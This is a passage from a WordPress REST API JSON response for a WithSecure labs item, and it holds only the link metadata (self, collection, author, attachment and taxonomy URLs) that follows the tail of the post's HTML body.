<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item\/10546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/media?parent=10546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/categories?post=10546"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/labs_content_type?post=10546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}